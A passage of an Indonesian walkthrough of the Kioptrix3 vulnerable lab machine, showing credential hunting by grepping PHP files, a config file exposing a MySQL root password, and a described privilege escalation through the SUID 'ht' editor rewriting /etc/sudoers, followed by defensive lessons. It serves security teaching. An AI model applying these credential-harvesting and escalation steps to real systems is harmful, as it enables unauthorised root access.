/usr/share/phpmyadmin/scripts/setup.php:736: $type = 'password';
/usr/share/phpmyadmin/scripts/setup.php:741: case 'password':
/usr/share/phpmyadmin/scripts/setup.php:827: array('Show password change form', 'ShowChgPassword', 'Whether to show form for changing password, this does not limit ability to execute the same command directly', FALSE),
/usr/share/phpmyadmin/scripts/setup.php:1007: array('Password for config auth', 'password', 'Leave empty if not using config auth', 'password'),
/usr/share/phpmyadmin/scripts/setup.php:1011: array('phpMyAdmin control user password', 'controlpass', 'Password for user which phpMyAdmin can use for various actions', 'password'),
/usr/share/phpmyadmin/scripts/setup.php:1351: $new_server = grab_values('host;extension;port;socket;connect_type;compress:bool;controluser;controlpass;auth_type;user;password;only_db;verbose;pmadb;bookmarktable:serialized;relation:serialized;table_info:serialized;table_coords:serialized;pdf_pages:serialized;column_info:serialized;designer_coords:serialized;history:serialized;AllowDeny:serialized;SignonSession;SignonURL;LogoutURL');
/usr/share/phpmyadmin/scripts/setup.php:1388: message('error', 'Empty phpMyAdmin control user password while using pmadb!');
/usr/share/phpmyadmin/scripts/setup.php:1423: unset($new_server['password']);
/usr/share/phpmyadmin/scripts/setup.php:1964: message('warning', 'You are not using secure connection, all data (including sensitive, like passwords) are transfered unencrypted!' . $redir, 'Not secure connection');
/usr/share/phpmyadmin/phpmyadmin.css.php:611:li#li_change_password {
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:28:$strAccessDeniedExplanation = 'phpMyAdmin ha provato a connettersi al server MySQL, e il server ha rifiutato la connessione. Si dovrebbe controllare il nome dell\'host, l\'username e la password nel file config.inc.php ed assicurarsi che corrispondano alle informazioni fornite dall\'amministratore del server MySQL.';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:131:$strChangePassword = 'Cambia password';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:380:$strInsecureMySQL = 'Il file di configurazione in uso contiene impostazioni (root con nessuna password) che corrispondono ai privilegi dell\'account MySQL predefinito. Un server MySQL funzionante con queste impostazioni è aperto a intrusioni, e si dovrebbe realmente riparare a questa falla nella sicurezza.';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:410:$strKeepPass = 'Non cambiare la password';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:549:$strPasswordChanged = 'La password per l\'utente %s è cambiata con successo.';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:550:$strPasswordEmpty = 'La password è vuota!';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:552:$strPasswordNotSame = 'La password non coincide!';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:704:$strSecretRequired = 'Adesso c\'è bisogno di una password per il file di configurazione (blowfish_secret).';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:1021:$strWrongUser = 'Nome utente o password errati. Accesso negato.';
/usr/share/phpmyadmin/lang/norwegian-utf-8.inc.php:26:$strAccessDeniedExplanation = 'phpMyAdmin forsøkte å koble til MySQL-serveren, og serveren avviste tilkoblingen. Du må kontrollere vert (host), brukernavn (username) og passord (password) i config.inc.php og sjekke at de tilsvarer den informasjonen du fikk fra MySQL-server administratoren.';
/usr/share/phpmyadmin/lang/persian-utf-8.inc.php:350:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.'; //to translate
/usr/share/phpmyadmin/lang/thai-utf-8.inc.php:600:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.'; //to translate
/usr/share/phpmyadmin/lang/hindi-utf-8.inc.php:272:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.'; //to translate
/usr/share/phpmyadmin/lang/hindi-utf-8.inc.php:483:$strInsecureMySQL = 'Your configuration file contains settings (root with no password) that correspond to the default MySQL privileged account. Your MySQL server is running with this default, is open to intrusion, and you really should fix this security hole.'; //to translate
/usr/share/phpmyadmin/lang/hindi-utf-8.inc.php:608:$strPasswordEmpty = 'The password is empty!'; //to translate
/usr/share/phpmyadmin/lang/hindi-utf-8.inc.php:610:$strPasswordNotSame = 'The passwords aren\'t the same!'; //to translate
/usr/share/phpmyadmin/lang/albanian-utf-8.inc.php:271:$strInsecureMySQL = 'File i konfigurimit në përdorim përmban zgjedhje (root pa asnjë password) që korrispondojnë me të drejtat e account MySQL të paracaktuar. Një server MySQL funksionues me këto zgjedhje është i pambrojtur ndaj sulmeve, dhe ju duhet patjetër të korrigjoni këtë vrimë në siguri.';
/usr/share/phpmyadmin/lang/georgian-utf-8.inc.php:360:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.'; //to translate
/usr/share/phpmyadmin/lang/georgian-utf-8.inc.php:552:$strInsecureMySQL = 'Your configuration file contains settings (root with no password) that correspond to the default MySQL privileged account. Your MySQL server is running with this default, is open to intrusion, and you really should fix this security hole.'; //to translate
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:28:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.';
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:131:$strChangePassword = 'Change password';
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:380:$strInsecureMySQL = 'Your configuration file contains settings (root with no password) that correspond to the default MySQL privileged account. Your MySQL server is running with this default, is open to intrusion, and you really should fix this security hole.';
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:410:$strKeepPass = 'Do not change the password';
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:549:$strPasswordChanged = 'The password for %s was changed successfully.';
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:550:$strPasswordEmpty = 'The password is empty!';
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:552:$strPasswordNotSame = 'The passwords aren\'t the same!';
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:1021:$strWrongUser = 'Wrong username/password. Access denied.';
/usr/share/phpmyadmin/lang/azerbaijani-utf-8.inc.php:603:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.'; //to translate
/usr/share/phpmyadmin/lang/afrikaans-utf-8.inc.php:385:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.'; //to translate
/usr/share/phpmyadmin/lang/afrikaans-utf-8.inc.php:563:$strInsecureMySQL = 'Your configuration file contains settings (root with no password) that correspond to the default MySQL privileged account. Your MySQL server is running with this default, is open to intrusion, and you really should fix this security hole.'; //to translate
/usr/share/phpmyadmin/lang/ukrainian-utf-8.inc.php:22:$strAccessDeniedExplanation = 'phpMyAdmin спробував з\'єднатися з MySQL сервером, але сервер не дозволив під\'єднання. Прошу перевірити значення host, username та password у файлі config.inc.php та впевнитися, що вони відповідають даним отриманим Вами від адміністратора MySQL сервера.';
/usr/share/phpmyadmin/lang/korean-utf-8.inc.php:442:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.'; //to translate
/usr/share/phpmyadmin/lang/sinhala-utf-8.inc.php:30:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.';
/usr/share/phpmyadmin/lang/sinhala-utf-8.inc.php:354:$strInsecureMySQL = 'Your configuration file contains settings (root with no password) that correspond to the default MySQL privileged account. Your MySQL server is running with this default, is open to intrusion, and you really should fix this security hole.';
/usr/share/phpmyadmin/lang/sinhala-utf-8.inc.php:517:$strPasswordChanged = 'The password for %s was changed successfully.';
/usr/share/phpmyadmin/lang/sinhala-utf-8.inc.php:518:$strPasswordEmpty = 'The password is empty!';
/usr/share/phpmyadmin/lang/sinhala-utf-8.inc.php:520:$strPasswordNotSame = 'The passwords aren\'t the same!';
/usr/share/phpmyadmin/lang/malay-utf-8.inc.php:440:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.'; //to translate
/usr/share/phpmyadmin/lang/french-utf-8.inc.php:25:$strAccessDeniedExplanation = 'phpMyAdmin a tenté de se connecter au serveur MySQL, et le serveur a rejeté la connexion. Veuillez vérifier les valeurs de "host", "username" et "password" dans votre configuration et vous assurer qu\'elles correspondent aux informations fournies par l\'administrateur du serveur MySQL.';
/usr/share/phpmyadmin/main.php:44: // password if the configuration permits
/usr/share/phpmyadmin/main.php:203: * Change password
/usr/share/phpmyadmin/main.php:208: PMA_printListItem($strChangePassword, 'li_change_password',
/usr/share/phpmyadmin/main.php:209: './user_password.php?' . $common_url_query);
/usr/share/phpmyadmin/main.php:343: && $cfg['Server']['password'] == '') {
/etc/phpmyadmin/config.inc.php:10: * NOTE: do not add security sensitive data to this file (like passwords)
/home/www/kioptrix3.com/gallery/gfunctions.php:11: $GLOBALS["gallarific_mysql_password"])
/home/www/kioptrix3.com/gallery/gfunctions.php:583: $password = escape($_POST["password"]);
/home/www/kioptrix3.com/gallery/gfunctions.php:679: $query = sprintf("insert into gallarific_users(username, password, usertype, firstname, lastname, email, datejoined, website, issuperuser, photo, joincode) values('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s')", $username, $password, "normaluser", $firstname, $lastname, $email, time(), $website, 0, $photo_file, $join_code);
/home/www/kioptrix3.com/gallery/gfunctions.php:771: if(isset($_POST["gusername"]) && isset($_POST["gpassword"])) {
/home/www/kioptrix3.com/gallery/gfunctions.php:773: $password = escape($_POST["gpassword"]);
/home/www/kioptrix3.com/gallery/gfunctions.php:774: $query = sprintf("select * from gallarific_users where username='%s' and password='%s'", $username, $password);
/home/www/kioptrix3.com/gallery/gfunctions.php:794: $error = "Your username or password is incorrect. Please login again.";
/home/www/kioptrix3.com/gallery/gfunctions.php:799: $error = "Your username or password is incorrect. Please login again.";
/home/www/kioptrix3.com/gallery/gfunctions.php:857: $password = escape($_POST["password"]);
/home/www/kioptrix3.com/gallery/gfunctions.php:946: $query = sprintf("update gallarific_users set password='%s', firstname='%s', lastname='%s', email='%s', website='%s' where userid='%d'", $password, $firstname, $lastname, $email, $website, $user_id);
/home/www/kioptrix3.com/gallery/gfunctions.php:948: $query = sprintf("update gallarific_users set password='%s', firstname='%s', lastname='%s', email='%s', website='%s', photo='%s' where userid='%d'", $password, $firstname, $lastname, $email, $website, $photo_file, $user_id);
/home/www/kioptrix3.com/gallery/gconfig.php:20: $GLOBALS["gallarific_mysql_password"] = "fuckeyou";
/home/www/kioptrix3.com/gallery/gconfig.php:24:if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$
Berdasarkan hasil pencarian dengan kata password pada file berekstensi *.php, ditemukan adanya password fuckeyou pada file gconfig.php dengan file path /home/www/kioptrix3.com/gallery/. Setelah ditelusuri lebih lanjut ternyata password fuckeyou adalah milik dari root untuk MySQL (lihat barus 52 dan 53). Bukan credential root milik Sistem Operasi, apabila kita gunakan untuk login menggunakan password tersebut pada account root maka akan muncul pesan “Authentication failure”.
loneferret@Kioptrix3:~$ cd /home/www/kioptrix3.com/gallery/
loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery$ ls -l
total 156
drwxr-xr-x 2 root root 4096 2011-04-12 16:24 BACK
-rw-r--r-- 1 root root 3573 2009-10-10 15:43 db.sql
drwxr-xr-x 3 root root 4096 2011-04-12 13:14 gadmin
-rw-r--r-- 1 root root 214 2011-04-12 15:15 gallery.php
-rw-r--r-- 1 root root 1440 2011-04-14 11:32 gconfig.php
-rw-r--r-- 1 root root 297 2011-04-12 19:26 gfooter.php
-rw-r--r-- 1 root root 38771 2011-04-12 15:19 gfunctions.php
-rw-r--r-- 1 root root 1009 2011-04-12 15:11 gheader.php
-rw-r--r-- 1 root root 252 2011-04-12 15:10 g.php
-rw-r--r-- 1 root root 249 2011-04-12 15:03 index.php
-rw-r--r-- 1 root root 10340 2011-04-12 15:21 install.BAK
-rw-r--r-- 1 root root 212 2011-04-12 16:24 login.php
-rw-r--r-- 1 root root 213 2011-04-12 15:13 logout.php
drwxrwxrwx 2 root root 4096 2011-04-12 21:21 photos
-rw-r--r-- 1 root root 213 2011-04-12 15:20 photos.php
-rw-r--r-- 1 root root 219 2011-04-12 15:16 post_comment.php
-rw-r--r-- 1 root root 249 2011-04-12 15:14 p.php
-rw-r--r-- 1 root root 214 2011-04-12 15:58 profile.php
-rw-r--r-- 1 root root 87 2009-10-10 15:44 readme.html
-rw-r--r-- 1 root root 213 2011-04-12 15:17 recent.php
-rw-r--r-- 1 root root 215 2011-04-12 16:21 register.php
drwxr-xr-x 2 root root 4096 2011-04-13 04:24 scopbin
-rw-r--r-- 1 root root 213 2011-04-12 16:23 search.php
-rw-r--r-- 1 root root 216 2011-04-12 15:22 slideshow.php
-rw-r--r-- 1 root root 211 2011-04-12 15:18 tags.php
drwxr-xr-x 6 root root 4096 2011-04-12 13:14 themes
-rw-r--r-- 1 root root 56 2009-10-10 16:23 version.txt
-rw-r--r-- 1 root root 211 2011-04-12 15:23 vote.php
loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery$
loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery$ cat gconfig.php
<?php
error_reporting(0);
/*
A sample Gallarific configuration file. You should edit
the installer details below and save this file as gconfig.php
Do not modify anything else if you don't know what it is.
*/
// Installer Details -----------------------------------------------
// Enter the full HTTP path to your Gallarific folder below,
// such as http://www.yoursite.com/gallery
// Do NOT include a trailing forward slash
$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";
$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";
// Setting Details -------------------------------------------------
if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
echo("A connection to the database couldn't be established: " . mysql_error());
die();
}else {
if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
echo("The Gallarific database couldn't be opened: " . mysql_error());
die();
}else {
$settings=mysql_query("select * from gallarific_settings");
if(mysql_num_rows($settings)!=0){
while($data=mysql_fetch_array($settings)){
$GLOBALS["{$data['settings_name']}"]=$data['settings_value'];
}
}
}
}
?>
loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery$
loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery$
loneferret@Kioptrix3:~$ id
uid=1000(loneferret) gid=100(users) groups=100(users)
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$ su root
Password:
su: Authentication failure
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$
Setelah melakukan penelusuran lebih lanjut. Kita menemukan beberapa hal menarik pada home folder milik user loneferret, yaitu adanya file bernama CompanyPolicy.Readme. Di dalam file tersebut disebutkan bahwa Lead Programmer (loneferret) harus menggunakan program bernama “ht” untuk membuat, melihat dan melakukan editing pada file. Apabila menggunakan program lain, maka akan ada sanksi manajemen. Perhatikan perhatikan eksekusi perintah berikut:
loneferret@Kioptrix3:~$ ls -l
total 32
-rwxrwxr-x 1 root root 26275 2011-01-12 10:45 checksec.sh
-rw-r--r-- 1 root root 224 2011-04-16 08:51 CompanyPolicy.README
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
DG
CEO
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$ sudo ht
Error opening terminal: xterm-256color.
loneferret@Kioptrix3:~$
Apabila program “ht” dijalankan terlihat muncul error. Untuk melakukan troubleshooting, kita cukup menambahkan perintah export TERM=xterm dan selanjutnya dapat menjalankan program “ht”. Selanjutnya setelah diselidiki lebih jauh ternyata program “ht” memiliki SUID permission, artinya ia berjalan dengan hak akses root. Hal ini tentu merupakan peluang untuk meningkatkan hak akses menjadi root. Perhatikan permission dari program “ht” sebagai berikut:
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$ find / -name ht 2>/dev/null
/usr/local/bin/ht
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$ ls -l /usr/local/ht
ls: cannot access /usr/local/ht: No such file or directory
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$ ls -l /usr/local/bin/ht
-rwsr-sr-x 1 root root 2072344 2011-04-16 07:26 /usr/local/bin/ht
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$
Maka langkah selanjutnya adalah kita akan menjalankan program “ht” dan menyunting file /etc/sudoers untuk memberikan hak akses root pada program /bin/sh. Setelah hal tersebut kita berhasil meningkatkan hak akses menjadi root, sebagaimana langkah-langkah pada gambar berikut ini:
Tampak pada rangkaian gambar 6 hingga gambar 8 bahwa penyerang telah berhasil meningkatkan hak aksesnya menjadi root dan telah berhasil menguasai server Kioptrix3 secara keseluruhan.
Lesson Learned
Pelajaran penting dari kisah serial Kioptrix bagian ketiga ini adalah seorang penyerang “sangat lapar” dengan credential. Diawali dari melakukan serangan terhadap layanan SSH dengan brute force untuk mendapatkan credential milik loneferret. Selanjutnya berhasil mengambil alih credential milik root untuk menguasai server secara keseluruhan dengan memanipulasi hak akses SUID pada program “ht”.
Awal dari bencana ini adalah lemahnya password dari loneferret sebagai Lead Programmer yang baru direkrut. Selanjutnya, sebagai pimpinan programmer ia tidak melakukan best practice pada secure coding, dimana ia melakukan menuliskan password bagi administrator MySQL.
Tentunya hal ini merupakan pelajaran penting bagi Penyelenggara SIstem Elektronik agar senantiasa melindungi credential milik sistemnya. Tidak hanya administrator saja yang dilindungi namun seluruh user secara keseluruhan. Karena penyerang akan bergerak secara horizontal sebelum akhirnya merebut credential milik root.
Py-Sec[dot]org 